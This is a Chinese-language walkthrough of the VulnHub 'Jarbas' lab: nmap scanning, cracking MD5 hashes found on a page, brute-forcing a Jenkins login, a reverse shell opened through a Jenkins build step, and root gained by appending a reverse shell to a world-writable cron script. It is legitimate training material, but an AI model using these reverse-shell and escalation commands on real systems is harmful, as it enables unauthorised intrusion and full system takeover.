Jarbas

• 写写打靶记录。
• 靶机地址：https://www.vulnhub.com/entry/jarbas-1,232/

信息收集

• Kali 和 靶机都处于同一网段内，直接查找靶机 IP 地址：

root at kali in ~ 
$ nmap -sn --min-rate 10000 192.168.92.0/24                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:13 CST
Nmap scan report for 192.168.92.1
Host is up (0.00040s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:F3:1F:1F (VMware)
Nmap scan report for 192.168.92.145
Host is up (0.00033s latency).
MAC Address: 00:0C:29:23:07:8B (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:E1:1E:EB (VMware)
Nmap scan report for 192.168.92.170
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.00 seconds

• 扫描开放端口：

root at kali in ~ 
$ nmap -p- --min-rate 10000 192.168.92.145 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:16 CST
Nmap scan report for 192.168.92.145
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

• 扫描端口对应服务：

root at kali in ~ 
$ nmap -p22,80,3306,8080 -sT -sV -O --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:18 CST
Nmap scan report for 192.168.92.145
Host is up (0.00056s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:23:07:8B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds

• 针对端口服务扫描一下漏洞：

root at kali in ~ 
$ nmap -p22,80,3306,8080 --script=vuln --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:20 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.92.145
Host is up (0.00048s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.31 seconds

• 分析一下扫描结果：

# 开放 21、22、80、3306 端口

22 - SSH 服务 - 弱口令、暴力破解
80 - Web 服务 - 漏洞形式多样
3306 - MySQL 服务 - 弱口令、暴力破解
8080 - Web 服务 - 漏洞形式多样

• 从 80 Web 开始测试。

目录扫描

• 访问 Web 服务：

• 嗯哼 Jenkins，使用 dirsearch 扫一扫：

root at kali in ~ 
$ dirsearch -u 'http://192.168.92.145'

• 发现几个目录，访问一下：

• 发现一个 access.html，访问一下：

• 提示“Creds encrypted in a safe way!”大概就是加密的认证，一看就知道是 MD5，严谨一点还是判断一下：

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

root at kali in ~ 
$ hash-identifier '5978a63b4654c73c60fa24f836386d87'                  
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM

• 判断出是 MD5，拿网站碰撞一下：

tiago:5978a63b4654c73c60fa24f836386d87 - italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5 - marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98 - vipsu

• 由于没找到登录框，去 8080 试试：

• 发现是一个 Jenkins 的登录窗口。

暴力破解

• 存在登录窗口，使用 Burpsuite 进行暴力破解：

• 爆破出账号密码：eder - vipsu。
• 登录一下：

Jenkins 漏洞

• 新建一个任务：

• 输入名字：

• 直接发现一个 Shell 命令行：

• 反弹一下：

# 靶机
/bin/bash -i >& /dev/tcp/192.168.92.170/4444 0>&1

# kali
root at kali in ~ 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...

• 点击立即构建：

• 成功反弹：

root at kali in ~ 
$ nc -lvvp 4444                                                       
listening on [any] 4444 ...
192.168.92.145: inverse host lookup failed: Unknown host
connect to [192.168.92.170] from (UNKNOWN) [192.168.92.145] 52200
bash: no job control in this shell
bash-4.2$ id
id
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0

Cron 提权

• 经过一系列测试，发现 crontab 下有一个 root 权限的计时任务：

bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

• 查看一下该文件：

bash-4.2$ ls -l /etc/script/CleaningScript.sh
ls -l /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr  1  2018 /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt

• 发现是一个具有读写执行权限的文件，直接写入 shell：

# 靶机
bash-4.2$ echo '/bin/bash -i >& /dev/tcp/192.168.92.170/4445 0>&1' >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.92.170/4445 0>&1' >> /etc/script/CleaningScript.sh

# kali
root at kali in ~ 
$ nc -lvvp 4445                                                       
listening on [any] 4445 ...

• 反弹成功：

root at kali in ~ 
$ nc -lvvp 4445
listening on [any] 4445 ...
192.168.92.145: inverse host lookup failed: Unknown host
connect to [192.168.92.170] from (UNKNOWN) [192.168.92.145] 49678
bash: no job control in this shell
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023

[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat fla*
cat fla*
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs